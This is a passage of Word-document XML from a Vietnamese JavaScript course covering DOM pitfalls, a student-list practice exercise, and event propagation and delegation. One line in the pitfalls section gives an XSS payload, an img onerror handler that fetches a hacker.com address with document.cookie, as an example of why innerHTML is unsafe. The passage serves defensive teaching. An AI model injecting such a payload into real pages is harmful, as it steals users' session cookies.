        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Lập trình viên viết mã: element.innerHTML = ${userInput}``. Nếu kẻ tấn công nhập chuỗi: &lt;img src="invalid" onerror="fetch('[https://hacker.com/steal?cookie=](https://hacker.com/steal?cookie=)' + document.cookie)"&gt;, mã độc sẽ lập tức được thực thi ngay trên trình duyệt của nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5450DD84" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Tuyệt đối không dùng innerHTML để render các chuỗi văn bản do người dùng nhập vào. Luôn luôn sử dụng thuộc tính textContent để trình duyệt tự động mã hóa mọi ký tự đặc biệt thành chuỗi an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F03E5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 2: Truy vấn DOM trả về null do chạy mã trước khi DOM sẵn sàng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B553419" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Nhúng thẻ &lt;script src="app.js"&gt; ở phần &lt;head&gt; của trang. Mở console thấy báo lỗi đỏ: Uncaught TypeError: Cannot read properties of null (reading 'addEventListener').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC56A2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Trình duyệt đọc HTML từ trên xuống dưới; khi thấy script ở &lt;head&gt;, nó dừng việc dựng DOM lại để tải và chạy script, lúc này các thẻ &lt;body&gt; bên dưới chưa hề tồn tại. Cách khắc phục chuẩn: Thêm thuộc tính defer vào thẻ script (&lt;script src="app.js" defer&gt;&lt;/script&gt;) hoặc lắng nghe sự kiện document.addEventListener('DOMContentLoaded', ...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A545D7F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 3: Hiểu lầm tính chất giữa NodeList và HTMLCollection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6193800A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Dùng document.getElementsByClassName('item') để lấy danh sách rồi gọi .map() hoặc .filter(), dẫn đến lỗi items.map is not a function. Hoặc dùng vòng lặp for xóa các item trong một Live HTMLCollection, làm biến mất một nửa danh sách do chỉ mục (index) bị trượt động sau mỗi lần xóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A3F498" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Chuyển đổi collection thành một mảng thực thụ bằng cú pháp Spread Operator Array.from(collection) hoặc [...collection], hoặc ưu tiên sử dụng querySelectorAll để nhận về Static NodeList có sẵn phương thức .forEach().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB59D1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Bài tập thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE15E4C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đề bài:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Xây dựng một ứng dụng "Quản lý Sinh viên" nhỏ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB6C5E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Một form gồm 2 ô nhập: Họ tên và Điểm số (0-10).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A9150F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Một bảng hiển thị danh sách sinh viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C99C228" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi nhấn "Thêm", dòng mới được tạo và chèn vào bảng. Nếu điểm dưới 5, dòng sinh viên đó phải tự động được gắn thêm class CSS .low-score (chữ màu đỏ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA4CF9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Mỗi dòng có một nút "Xóa" để xóa chính sinh viên đó khỏi bảng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327E180" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiêu chí nghiệm thu (Acceptance Criteria):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02947C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Sử dụng querySelector, createElement, append, remove.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A07409A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Tuyệt đối không sử dụng innerHTML để đưa dữ liệu tên sinh viên vào DOM (chống XSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346089E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Xóa sinh viên cập nhật lại giao diện ngay lập tức mà không tải lại trang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C589D6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bài 2: Event Handling &amp; Event Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7545BAEB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Khái niệm cốt lõi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F20C3F5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô hình Lập trình Hướng Sự kiện (Event-Driven Programming):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A47C5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>JavaScript trên trình duyệt vận hành theo mô hình bất đồng bộ hướng sự kiện. Trình duyệt không chạy một vòng lặp vô tận kiểm tra xem người dùng có bấm chuột hay không, mà thay vào đó nó duy trì một hàng đợi sự kiện (Event Queue). Khi người dùng tương tác (click chuột, gõ phím, di chuột, submit form), trình duyệt đóng gói tương tác đó thành một đối tượng Event và đưa vào hàng đợi. Lập trình viên sử dụng phương thức chuẩn hóa element.addEventListener(type, listener, options) để đăng ký hàm xử lý callback sẽ được kích hoạt khi sự kiện xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6070527E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vòng đời Lan truyền Sự kiện (Event Propagation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019846A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Một sự kiện khi phát sinh không chỉ đơn thuần kích hoạt trên một phần tử duy nhất, mà nó thực hiện một hành trình di chuyển xuyên suốt cây DOM gồm 3 giai đoạn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF9ABC6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Capturing Phase (Giai đoạn Chụp bắt):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Sự kiện bắt đầu từ đỉnh cao nhất của tài liệu (Window -&gt; Document -&gt; &lt;html&gt; -&gt; &lt;body&gt;...) đi xuống dần các cấp cha mẹ cho tới khi chạm đến phần tử mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3FBFE4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Target Phase (Giai đoạn Đích):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Sự kiện kích hoạt ngay tại chính phần tử trực tiếp nhận tương tác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB17C80" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Bubbling Phase (Giai đoạn Nổi bọt):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Sau khi chạm đích, sự kiện quay ngược đầu, "nổi bọt" dần từ phần tử con lên các cấp cha, ông, tổ tiên cho tới khi quay lại Window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01F8EB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kỹ thuật Ủy quyền Sự kiện (Event Delegation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B70E9C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Dựa vào cơ chế Nổi bọt (Bubbling), thay vì phải gắn hàng trăm event listener riêng lẻ lên từng phần tử con (gây tốn bộ nhớ RAM nghiêm trọng), chúng ta chỉ cần </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gắn DUY NHẤT một listener lên phần tử cha chung</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t>. Khi bất kỳ phần tử con nào bên trong được click, sự kiện sẽ nổi bọt lên cha. Tại cha, chúng ta kiểm tra thuộc tính event.target để xác định chính xác phần tử con nào vừa được nhấp vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B85C34" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kiểm soát Luồng Sự kiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5EF17" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>event.preventDefault(): Chặn hành vi mặc định của trình duyệt đối với phần tử đó (ví dụ: chặn thẻ &lt;a&gt; chuyển hướng trang, chặn &lt;form&gt; tải lại trang khi submit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A201AE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>event.stopPropagation(): Ngăn chặn ngay lập tức không cho sự kiện tiếp tục nổi bọt lên các cấp cha mẹ phía trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60271CCB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Cơ chế hoạt động chi tiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57887482" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Hành trình 3 giai đoạn của một sự kiện nhấp chuột (Click Event) và cơ chế ủy quyền:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA741F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Interaction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Người dùng dùng chuột nhấn vào một icon bên trong một nút bấm nằm trong danh sách.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45759B62" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 1 — Capturing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Trình duyệt duyệt cây DOM từ đỉnh xuống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD6DB70" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Window </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Document </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Body </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> TR </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> TD </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Button (Mặc định addEventListener bỏ qua pha này trừ khi truyền { capture: true }).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD338E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 2 — Target:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Sự kiện chạm tới thẻ &lt;button&gt;. Thuộc tính event.target được thiết lập chính là node này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F7638" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 3 — Bubbling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Sự kiện bắt đầu dội ngược lên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8745EB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Button </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> TD </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> TR </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Body </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Document </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639220B6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event Delegation Interception (Đánh chặn tại cha):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FDC5DF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Giả sử trên thẻ &lt;table&gt; có gắn một listener ở pha Bubbling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D0175" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi sự kiện nổi bọt chạm tới &lt;table&gt;, hàm callback của &lt;table&gt; được kích hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DD2AC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Lập trình viên sử dụng phương thức event.target.closest('button') để tìm xem liệu điểm xuất phát của sự kiện có nằm trong một nút bấm hợp lệ hay không và thực thi logic nghiệp vụ tương ứng.</w:t>
